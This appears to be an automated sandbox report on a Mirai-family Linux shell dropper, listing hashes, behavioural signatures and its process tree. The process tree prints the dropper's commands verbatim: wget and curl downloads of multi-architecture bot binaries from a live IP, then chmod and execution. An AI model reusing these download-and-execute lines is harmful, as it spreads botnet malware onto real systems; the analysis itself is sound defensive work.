Analysis
-
max time kernel
149s -
max time network
151s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240729-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240729-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
06-01-2025 06:42
Static task
static1
Behavioral task
behavioral1
Sample
ohshit.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
ohshit.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
ohshit.sh
Resource
debian9-mipsbe-20240729-en
General
-
Target
ohshit.sh
-
Size
2KB
-
MD5
bb9b02790d9369cfdce60911efa478c8
-
SHA1
cf899d0844a5cbac80784008dd7ff20ddc95ef8f
-
SHA256
8562b9fbc61584ce74c2f56847565faccf053134a8f4abf4aaee8e2ed82ccfc5
-
SHA512
55842a12c510f36d7c8d9f1b35bebf9729421d061f14b9cd1c895fab850087dc091b57a641faad012b785340edfeb5cb72b68abc22090e9cf3f842075bf0bb80
Malware Config
Extracted
mirai
LZRD
Signatures
-
Mirai family
-
File and Directory Permissions Modification 1 TTPs 15 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1536 chmod 1576 chmod 1584 chmod 1620 chmod 1528 chmod 1630 chmod 1656 chmod 1594 chmod 1608 chmod 1664 chmod 1672 chmod 1544 chmod 1552 chmod 1560 chmod 1568 chmod -
Executes dropped EXE 15 IoCs
ioc pid Process /tmp/WTF 1529 WTF /tmp/WTF 1537 WTF /tmp/WTF 1545 WTF /tmp/WTF 1553 WTF /tmp/WTF 1561 WTF /tmp/WTF 1569 WTF /tmp/WTF 1577 WTF /tmp/WTF 1585 WTF /tmp/WTF 1595 WTF /tmp/WTF 1609 WTF /tmp/WTF 1621 WTF /tmp/WTF 1631 WTF /tmp/WTF 1657 WTF /tmp/WTF 1665 WTF /tmp/WTF 1673 WTF -
Modifies Watchdog functionality 1 TTPs 30 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/misc/watchdog WTF -
Enumerates running processes
Discovers information about currently running processes on the system
-
Writes file to system bin folder 30 IoCs
description ioc Process File opened for modification /sbin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /bin/watchdog WTF -
resource yara_rule behavioral1/files/fstream-1.dat upx -
description ioc Process File opened for reading /proc/1327/cmdline WTF File opened for reading /proc/682/cmdline WTF File opened for reading /proc/1056/cmdline WTF File opened for reading /proc/1522/cmdline WTF File opened for reading /proc/500/cmdline WTF File opened for reading /proc/1522/cmdline WTF File opened for reading /proc/966/cmdline WTF File opened for reading /proc/1313/cmdline WTF File opened for reading /proc/1331/cmdline WTF File opened for reading /proc/1393/cmdline WTF File opened for reading /proc/616/cmdline WTF File opened for reading /proc/1556/cmdline WTF File opened for reading /proc/690/cmdline WTF File opened for reading /proc/1207/cmdline WTF File opened for reading /proc/1173/cmdline WTF File opened for reading /proc/1668/cmdline WTF File opened for reading /proc/1027/cmdline WTF File opened for reading /proc/1580/cmdline WTF File opened for reading /proc/1676/cmdline WTF File opened for reading /proc/989/cmdline WTF File opened for reading /proc/1393/cmdline WTF File opened for reading /proc/447/cmdline WTF File opened for reading /proc/1075/cmdline WTF File opened for reading /proc/1352/cmdline WTF File opened for reading /proc/1538/cmdline WTF File opened for reading /proc/547/cmdline WTF File opened for reading /proc/1112/cmdline WTF File opened for reading /proc/1588/cmdline WTF File opened for reading /proc/1075/cmdline WTF File opened for reading /proc/686/cmdline WTF File opened for reading /proc/1204/cmdline WTF File opened for reading /proc/1362/cmdline WTF File opened for reading /proc/1598/cmdline WTF File opened for reading /proc/1099/cmdline WTF File opened for reading /proc/1140/cmdline WTF File opened for reading /proc/1331/cmdline WTF File opened for reading /proc/428/cmdline WTF File opened for reading /proc/971/cmdline WTF File opened for reading /proc/971/cmdline WTF File opened for reading /proc/616/cmdline WTF File opened for reading /proc/1027/cmdline WTF File opened for reading /proc/501/cmdline WTF File opened for reading /proc/1666/cmdline WTF File opened for reading /proc/1564/cmdline WTF File opened for reading /proc/1204/cmdline WTF File opened for reading /proc/434/cmdline WTF File opened for reading /proc/1212/cmdline WTF File opened for reading /proc/1186/cmdline WTF File opened for reading /proc/1207/cmdline WTF File opened for reading /proc/1580/cmdline WTF File opened for reading /proc/1213/cmdline WTF File opened for reading /proc/1140/cmdline WTF File opened for reading /proc/1532/cmdline WTF File opened for reading /proc/1570/cmdline WTF File opened for reading /proc/1297/cmdline WTF File opened for reading /proc/989/cmdline WTF File opened for reading /proc/1204/cmdline WTF File opened for reading /proc/1588/cmdline WTF File opened for reading /proc/1622/cmdline WTF File opened for reading /proc/1674/cmdline WTF File opened for reading /proc/1362/cmdline WTF File opened for reading /proc/989/cmdline WTF File opened for reading /proc/1517/cmdline WTF File opened for reading /proc/1087/cmdline WTF -
System Network Configuration Discovery 1 TTPs 2 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 1534 curl 1533 wget -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/wind.mips curl File opened for modification /tmp/wind.x86_64 curl File opened for modification /tmp/wind.x86 wget File opened for modification /tmp/wind.i468 curl File opened for modification /tmp/wind.arm5 wget File opened for modification /tmp/wind.spc curl File opened for modification /tmp/WTF ohshit.sh File opened for modification /tmp/wind.sh4 wget File opened for modification /tmp/wind.x86 curl File opened for modification /tmp/wind.ppc wget File opened for modification /tmp/wind.arm5 curl File opened for modification /tmp/wind.sh4 curl File opened for modification /tmp/wind.m68k curl File opened for modification /tmp/wind.mips wget File opened for modification /tmp/wind.arc curl File opened for modification /tmp/wind.arm wget File opened for modification /tmp/wind.arm7 curl File opened for modification /tmp/wind.arc wget File opened for modification /tmp/wind.i686 curl File opened for modification /tmp/wind.mpsl wget File opened for modification /tmp/wind.arm7 wget File opened for modification /tmp/wind.ppc curl File opened for modification /tmp/wind.spc wget File opened for modification /tmp/wind.m68k wget File opened for modification /tmp/wind.mpsl curl File opened for modification /tmp/wind.arm curl File opened for modification /tmp/wind.arm6 wget File opened for modification /tmp/wind.arm6 curl
Processes
-
/tmp/ohshit.sh/tmp/ohshit.sh1⤵
- Writes file to tmp directory
PID:1520 -
/usr/bin/wgetwget http://154.216.17.34/hiddenbin/wind.x862⤵
- Writes file to tmp directory
PID:1521
-
-
/usr/bin/curlcurl -O http://154.216.17.34/hiddenbin/wind.x862⤵
- Writes file to tmp directory
PID:1526
-
-
/bin/catcat wind.x862⤵PID:1527
-
-
/bin/chmodchmod +x config-err-A5n6Lw netplan_cyfu_j2f ohshit.sh snap-private-tmp ssh-FwdSeRdKExjS systemd-private-0daf21851a964cbfb15f7e48733a4b8e-bolt.service-1lFuEw systemd-private-0daf21851a964cbfb15f7e48733a4b8e-colord.service-VWK2SA systemd-private-0daf21851a964cbfb15f7e48733a4b8e-ModemManager.service-f0j3FW systemd-private-0daf21851a964cbfb15f7e48733a4b8e-systemd-resolved.service-NTInua systemd-private-0daf21851a964cbfb15f7e48733a4b8e-systemd-timedated.service-rHu34Q wind.x86 WTF2⤵
- File and Directory Permissions Modification
PID:1528
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1529
-
-
/usr/bin/wgetwget http://154.216.17.34/hiddenbin/wind.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1533
-
-
/usr/bin/curlcurl -O http://154.216.17.34/hiddenbin/wind.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1534
-
-
/bin/chmodchmod +x config-err-A5n6Lw netplan_cyfu_j2f ohshit.sh snap-private-tmp ssh-FwdSeRdKExjS systemd-private-0daf21851a964cbfb15f7e48733a4b8e-bolt.service-1lFuEw systemd-private-0daf21851a964cbfb15f7e48733a4b8e-colord.service-VWK2SA systemd-private-0daf21851a964cbfb15f7e48733a4b8e-ModemManager.service-f0j3FW systemd-private-0daf21851a964cbfb15f7e48733a4b8e-systemd-resolved.service-NTInua systemd-private-0daf21851a964cbfb15f7e48733a4b8e-systemd-timedated.service-rHu34Q wind.mips wind.x86 WTF2⤵
- File and Directory Permissions Modification
PID:1536
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1537
-
-
/usr/bin/wgetwget http://154.216.17.34/hiddenbin/wind.arc2⤵
- Writes file to tmp directory
PID:1541
-
-
/usr/bin/curlcurl -O http://154.216.17.34/hiddenbin/wind.arc2⤵
- Writes file to tmp directory
PID:1542
-
-
/bin/chmodchmod +x config-err-A5n6Lw netplan_cyfu_j2f ohshit.sh snap-private-tmp ssh-FwdSeRdKExjS systemd-private-0daf21851a964cbfb15f7e48733a4b8e-bolt.service-1lFuEw systemd-private-0daf21851a964cbfb15f7e48733a4b8e-colord.service-VWK2SA systemd-private-0daf21851a964cbfb15f7e48733a4b8e-ModemManager.service-f0j3FW systemd-private-0daf21851a964cbfb15f7e48733a4b8e-systemd-resolved.service-NTInua systemd-private-0daf21851a964cbfb15f7e48733a4b8e-systemd-timedated.service-rHu34Q wind.arc wind.mips wind.x86 WTF2⤵
- File and Directory Permissions Modification
PID:1544
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1545
-
-
/usr/bin/wgetwget http://154.216.17.34/hiddenbin/wind.i4682⤵PID:1549
-
-
/usr/bin/curlcurl -O http://154.216.17.34/hiddenbin/wind.i4682⤵
- Writes file to tmp directory
PID:1550
-
-
/bin/chmodchmod +x config-err-A5n6Lw netplan_cyfu_j2f ohshit.sh snap-private-tmp ssh-FwdSeRdKExjS systemd-private-0daf21851a964cbfb15f7e48733a4b8e-bolt.service-1lFuEw systemd-private-0daf21851a964cbfb15f7e48733a4b8e-colord.service-VWK2SA systemd-private-0daf21851a964cbfb15f7e48733a4b8e-ModemManager.service-f0j3FW systemd-private-0daf21851a964cbfb15f7e48733a4b8e-systemd-resolved.service-NTInua systemd-private-0daf21851a964cbfb15f7e48733a4b8e-systemd-timedated.service-rHu34Q wind.arc wind.i468 wind.mips wind.x86 WTF2⤵
- File and Directory Permissions Modification
PID:1552
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1553
-
-
/usr/bin/wgetwget http://154.216.17.34/hiddenbin/wind.i6862⤵PID:1557
-
-
/usr/bin/curlcurl -O http://154.216.17.34/hiddenbin/wind.i6862⤵
- Writes file to tmp directory
PID:1558
-
-
/bin/chmodchmod +x config-err-A5n6Lw netplan_cyfu_j2f ohshit.sh snap-private-tmp ssh-FwdSeRdKExjS systemd-private-0daf21851a964cbfb15f7e48733a4b8e-bolt.service-1lFuEw systemd-private-0daf21851a964cbfb15f7e48733a4b8e-colord.service-VWK2SA systemd-private-0daf21851a964cbfb15f7e48733a4b8e-ModemManager.service-f0j3FW systemd-private-0daf21851a964cbfb15f7e48733a4b8e-systemd-resolved.service-NTInua systemd-private-0daf21851a964cbfb15f7e48733a4b8e-systemd-timedated.service-rHu34Q wind.arc wind.i468 wind.i686 wind.mips wind.x86 WTF2⤵
- File and Directory Permissions Modification
PID:1560
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1561
-
-
/usr/bin/wgetwget http://154.216.17.34/hiddenbin/wind.x86_642⤵PID:1565
-
-
/usr/bin/curlcurl -O http://154.216.17.34/hiddenbin/wind.x86_642⤵
- Writes file to tmp directory
PID:1566
-
-
/bin/chmodchmod +x config-err-A5n6Lw netplan_cyfu_j2f ohshit.sh snap-private-tmp ssh-FwdSeRdKExjS systemd-private-0daf21851a964cbfb15f7e48733a4b8e-bolt.service-1lFuEw systemd-private-0daf21851a964cbfb15f7e48733a4b8e-colord.service-VWK2SA systemd-private-0daf21851a964cbfb15f7e48733a4b8e-ModemManager.service-f0j3FW systemd-private-0daf21851a964cbfb15f7e48733a4b8e-systemd-resolved.service-NTInua systemd-private-0daf21851a964cbfb15f7e48733a4b8e-systemd-timedated.service-rHu34Q wind.arc wind.i468 wind.i686 wind.mips wind.x86 wind.x86_64 WTF2⤵
- File and Directory Permissions Modification
PID:1568
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1569
-
-
/usr/bin/wgetwget http://154.216.17.34/hiddenbin/wind.mpsl2⤵
- Writes file to tmp directory
PID:1573
-
-
/usr/bin/curlcurl -O http://154.216.17.34/hiddenbin/wind.mpsl2⤵
- Writes file to tmp directory
PID:1574
-
-
/bin/chmodchmod +x config-err-A5n6Lw netplan_cyfu_j2f ohshit.sh snap-private-tmp ssh-FwdSeRdKExjS systemd-private-0daf21851a964cbfb15f7e48733a4b8e-bolt.service-1lFuEw systemd-private-0daf21851a964cbfb15f7e48733a4b8e-colord.service-VWK2SA systemd-private-0daf21851a964cbfb15f7e48733a4b8e-ModemManager.service-f0j3FW systemd-private-0daf21851a964cbfb15f7e48733a4b8e-systemd-resolved.service-NTInua systemd-private-0daf21851a964cbfb15f7e48733a4b8e-systemd-timedated.service-rHu34Q wind.arc wind.i468 wind.i686 wind.mips wind.mpsl wind.x86 wind.x86_64 WTF2⤵
- File and Directory Permissions Modification
PID:1576
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1577
-
-
/usr/bin/wgetwget http://154.216.17.34/hiddenbin/wind.arm2⤵
- Writes file to tmp directory
PID:1581
-
-
/usr/bin/curlcurl -O http://154.216.17.34/hiddenbin/wind.arm2⤵
- Writes file to tmp directory
PID:1582
-
-
/bin/chmodchmod +x config-err-A5n6Lw netplan_cyfu_j2f ohshit.sh snap-private-tmp ssh-FwdSeRdKExjS systemd-private-0daf21851a964cbfb15f7e48733a4b8e-bolt.service-1lFuEw systemd-private-0daf21851a964cbfb15f7e48733a4b8e-colord.service-VWK2SA systemd-private-0daf21851a964cbfb15f7e48733a4b8e-ModemManager.service-f0j3FW systemd-private-0daf21851a964cbfb15f7e48733a4b8e-systemd-resolved.service-NTInua systemd-private-0daf21851a964cbfb15f7e48733a4b8e-systemd-timedated.service-rHu34Q wind.arc wind.arm wind.i468 wind.i686 wind.mips wind.mpsl wind.x86 wind.x86_64 WTF2⤵
- File and Directory Permissions Modification
PID:1584
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1585
-
-
/usr/bin/wgetwget http://154.216.17.34/hiddenbin/wind.arm52⤵
- Writes file to tmp directory
PID:1589
-
-
/usr/bin/curlcurl -O http://154.216.17.34/hiddenbin/wind.arm52⤵
- Writes file to tmp directory
PID:1590
-
-
/bin/chmodchmod +x config-err-A5n6Lw netplan_cyfu_j2f ohshit.sh snap-private-tmp ssh-FwdSeRdKExjS systemd-private-0daf21851a964cbfb15f7e48733a4b8e-colord.service-VWK2SA systemd-private-0daf21851a964cbfb15f7e48733a4b8e-ModemManager.service-f0j3FW systemd-private-0daf21851a964cbfb15f7e48733a4b8e-systemd-resolved.service-NTInua systemd-private-0daf21851a964cbfb15f7e48733a4b8e-systemd-timedated.service-rHu34Q wind.arc wind.arm wind.arm5 wind.i468 wind.i686 wind.mips wind.mpsl wind.x86 wind.x86_64 WTF2⤵
- File and Directory Permissions Modification
PID:1594
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1595
-
-
/usr/bin/wgetwget http://154.216.17.34/hiddenbin/wind.arm62⤵
- Writes file to tmp directory
PID:1599
-
-
/usr/bin/curlcurl -O http://154.216.17.34/hiddenbin/wind.arm62⤵
- Writes file to tmp directory
PID:1604
-
-
/bin/chmodchmod +x config-err-A5n6Lw netplan_cyfu_j2f ohshit.sh snap-private-tmp ssh-FwdSeRdKExjS systemd-private-0daf21851a964cbfb15f7e48733a4b8e-colord.service-VWK2SA systemd-private-0daf21851a964cbfb15f7e48733a4b8e-ModemManager.service-f0j3FW systemd-private-0daf21851a964cbfb15f7e48733a4b8e-systemd-resolved.service-NTInua systemd-private-0daf21851a964cbfb15f7e48733a4b8e-systemd-timedated.service-rHu34Q wind.arc wind.arm wind.arm5 wind.arm6 wind.i468 wind.i686 wind.mips wind.mpsl wind.x86 wind.x86_64 WTF2⤵
- File and Directory Permissions Modification
PID:1608
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1609
-
-
/usr/bin/wgetwget http://154.216.17.34/hiddenbin/wind.arm72⤵
- Writes file to tmp directory
PID:1613
-
-
/usr/bin/curlcurl -O http://154.216.17.34/hiddenbin/wind.arm72⤵
- Writes file to tmp directory
PID:1618
-
-
/bin/chmodchmod +x config-err-A5n6Lw netplan_cyfu_j2f ohshit.sh snap-private-tmp ssh-FwdSeRdKExjS systemd-private-0daf21851a964cbfb15f7e48733a4b8e-bolt.service-xtt2oo systemd-private-0daf21851a964cbfb15f7e48733a4b8e-colord.service-VWK2SA systemd-private-0daf21851a964cbfb15f7e48733a4b8e-ModemManager.service-f0j3FW systemd-private-0daf21851a964cbfb15f7e48733a4b8e-systemd-resolved.service-NTInua systemd-private-0daf21851a964cbfb15f7e48733a4b8e-systemd-timedated.service-rHu34Q wind.arc wind.arm wind.arm5 wind.arm6 wind.arm7 wind.i468 wind.i686 wind.mips wind.mpsl wind.x86 wind.x86_64 WTF2⤵
- File and Directory Permissions Modification
PID:1620
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1621
-
-
/usr/bin/wgetwget http://154.216.17.34/hiddenbin/wind.ppc2⤵
- Writes file to tmp directory
PID:1625
-
-
/usr/bin/curlcurl -O http://154.216.17.34/hiddenbin/wind.ppc2⤵
- Writes file to tmp directory
PID:1626
-
-
/bin/chmodchmod +x config-err-A5n6Lw netplan_cyfu_j2f ohshit.sh snap-private-tmp ssh-FwdSeRdKExjS systemd-private-0daf21851a964cbfb15f7e48733a4b8e-colord.service-VWK2SA systemd-private-0daf21851a964cbfb15f7e48733a4b8e-ModemManager.service-f0j3FW systemd-private-0daf21851a964cbfb15f7e48733a4b8e-systemd-resolved.service-NTInua systemd-private-0daf21851a964cbfb15f7e48733a4b8e-systemd-timedated.service-rHu34Q wind.arc wind.arm wind.arm5 wind.arm6 wind.arm7 wind.i468 wind.i686 wind.mips wind.mpsl wind.ppc wind.x86 wind.x86_64 WTF2⤵
- File and Directory Permissions Modification
PID:1630
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1631
-
-
/usr/bin/wgetwget http://154.216.17.34/hiddenbin/wind.spc2⤵
- Writes file to tmp directory
PID:1635
-
-
/usr/bin/curlcurl -O http://154.216.17.34/hiddenbin/wind.spc2⤵
- Writes file to tmp directory
PID:1646
-
-
/bin/chmodchmod +x config-err-A5n6Lw netplan_cyfu_j2f ohshit.sh snap-private-tmp ssh-FwdSeRdKExjS systemd-private-0daf21851a964cbfb15f7e48733a4b8e-colord.service-VWK2SA systemd-private-0daf21851a964cbfb15f7e48733a4b8e-ModemManager.service-f0j3FW systemd-private-0daf21851a964cbfb15f7e48733a4b8e-systemd-resolved.service-NTInua systemd-private-0daf21851a964cbfb15f7e48733a4b8e-systemd-timedated.service-rHu34Q wind.arc wind.arm wind.arm5 wind.arm6 wind.arm7 wind.i468 wind.i686 wind.mips wind.mpsl wind.ppc wind.spc wind.x86 wind.x86_64 WTF2⤵
- File and Directory Permissions Modification
PID:1656
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1657
-
-
/usr/bin/wgetwget http://154.216.17.34/hiddenbin/wind.m68k2⤵
- Writes file to tmp directory
PID:1661
-
-
/usr/bin/curlcurl -O http://154.216.17.34/hiddenbin/wind.m68k2⤵
- Writes file to tmp directory
PID:1662
-
-
/bin/chmodchmod +x config-err-A5n6Lw netplan_cyfu_j2f ohshit.sh snap-private-tmp ssh-FwdSeRdKExjS systemd-private-0daf21851a964cbfb15f7e48733a4b8e-colord.service-VWK2SA systemd-private-0daf21851a964cbfb15f7e48733a4b8e-ModemManager.service-f0j3FW systemd-private-0daf21851a964cbfb15f7e48733a4b8e-systemd-resolved.service-NTInua systemd-private-0daf21851a964cbfb15f7e48733a4b8e-systemd-timedated.service-rHu34Q wind.arc wind.arm wind.arm5 wind.arm6 wind.arm7 wind.i468 wind.i686 wind.m68k wind.mips wind.mpsl wind.ppc wind.spc wind.x86 wind.x86_64 WTF2⤵
- File and Directory Permissions Modification
PID:1664
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1665
-
-
/usr/bin/wgetwget http://154.216.17.34/hiddenbin/wind.sh42⤵
- Writes file to tmp directory
PID:1669
-
-
/usr/bin/curlcurl -O http://154.216.17.34/hiddenbin/wind.sh42⤵
- Writes file to tmp directory
PID:1670
-
-
/bin/chmodchmod +x config-err-A5n6Lw netplan_cyfu_j2f ohshit.sh snap-private-tmp ssh-FwdSeRdKExjS systemd-private-0daf21851a964cbfb15f7e48733a4b8e-colord.service-VWK2SA systemd-private-0daf21851a964cbfb15f7e48733a4b8e-ModemManager.service-f0j3FW systemd-private-0daf21851a964cbfb15f7e48733a4b8e-systemd-resolved.service-NTInua systemd-private-0daf21851a964cbfb15f7e48733a4b8e-systemd-timedated.service-rHu34Q wind.arc wind.arm wind.arm5 wind.arm6 wind.arm7 wind.i468 wind.i686 wind.m68k wind.mips wind.mpsl wind.ppc wind.sh4 wind.spc wind.x86 wind.x86_64 WTF2⤵
- File and Directory Permissions Modification
PID:1672
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1673
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
25KB
MD5e802a5d2fc1758f633787e96999218c9
SHA1e3bea9702230370bd3a9b7b503aedaf6eb8a99f0
SHA256bedafc169492f127eddcab8a5eba9b7aa57acb0c43aa7b24ab4953331ed58b79
SHA5126fabbf929eed5db052fb111dcb8582549481d4114b12c153a989180a9a9a0b052fbb85687d36221d59b542d62a2173c945c4fba22b374ea79685df09be727df8